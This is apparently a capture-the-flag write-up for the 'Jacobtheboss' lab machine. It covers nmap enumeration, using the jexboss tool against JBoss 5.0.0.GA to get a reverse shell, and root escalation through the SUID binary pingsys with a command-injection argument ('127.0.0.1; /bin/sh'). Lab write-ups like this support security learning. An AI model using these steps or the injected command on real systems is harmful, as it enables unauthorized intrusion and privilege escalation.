# Jacobtheboss ## Nmap ``` sudo nmap 10.10.166.109 -p- -sS -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.3.20) 111/tcp open rpcbind 2-4 (RPC #100000) 1090/tcp open java-rmi Java RMI 1098/tcp open java-rmi Java RMI 1099/tcp open java-object Java Object Serialization 3306/tcp open mysql MariaDB (unauthorized) 3873/tcp open java-object Java Object Serialization 4444/tcp open java-rmi Java RMI 4445/tcp open java-object Java Object Serialization 4446/tcp open java-object Java Object Serialization 4457/tcp open tandem-print Sharp printer tandem printing 4712/tcp open msdtc Microsoft Distributed Transaction Coordinator (error) 4713/tcp open pulseaudio? 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 8083/tcp open http JBoss service httpd 22764/tcp open unknown 45592/tcp open java-rmi Java RMI 45722/tcp open unknown ``` {% hint style="info" %} Add jacobtheboss.box to /etc/hosts before starting {% endhint %} Checking our port 80 takes us to a blog post where the user jacob comments about the new content maanger for the company. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d8cf48162161b92f2369b77ab52b95476af11254%2Fimage.png?alt=media) Other than this we do not have anything interesting regarding port 80. Checking out port 8080 we see the server is running JBoss. JBoss is a application server which you can read more about here: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a9e6f4dcc9f9ba61c0c2f82c647b8c199d4ac11b%2Fimage.png?alt=media) Researching on how to find JBoss version we can check the followin path for this information. `/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system%3Atype%3DServer` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-243ea04c06339921145e826315f43482a585a477%2Fimage.png?alt=media) Checking the VersionNumber field we see we are running version 5.0.0.GA. Researching exploits for this we find a popular exploitation python tool call jexboss. {% embed url="" %} Download and install as per instructions on the Github page then execute as follows: ``` sudo python2 jexboss.py -u jacobtheboss.box:8080 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-86c17647e7cdf44c9ab5dd17934c17944f4df974%2Fimage.png?alt=media) Set up a `netcat` listener on the attacking machine and when prompted to do so enter your attacking machine IP and port. This should gives us a proper reverse shell. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8fefe598ae37bcfbdc101db5a9f8daa676b1562a%2Fimage.png?alt=media) After connecting I transferred over linpeas and executed. Soon linpeas finds that the binary `/usr/bin/pingsys` has a SUIT bit set. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-261733cb9d759110b7dfb180384af7a40eb69fa1%2Fimage.png?alt=media) Researching the binary on Google we come to the following post on stackexchange. {% embed url="" %} According to the top answer we can execute a command after pingsys which can be used to spawn a shell with the existing permissions of pingsys. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-879bc9e5722886b485717756921900a4b4e9a991%2Fimage.png?alt=media) Run the following command on our shell to escalate to a root shell. ``` /usr/bin/pingsys '127.0.0.1; /bin/sh' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-73a5a31dde23d5dd12ae7995a20f04800509abbd%2Fimage.png?alt=media)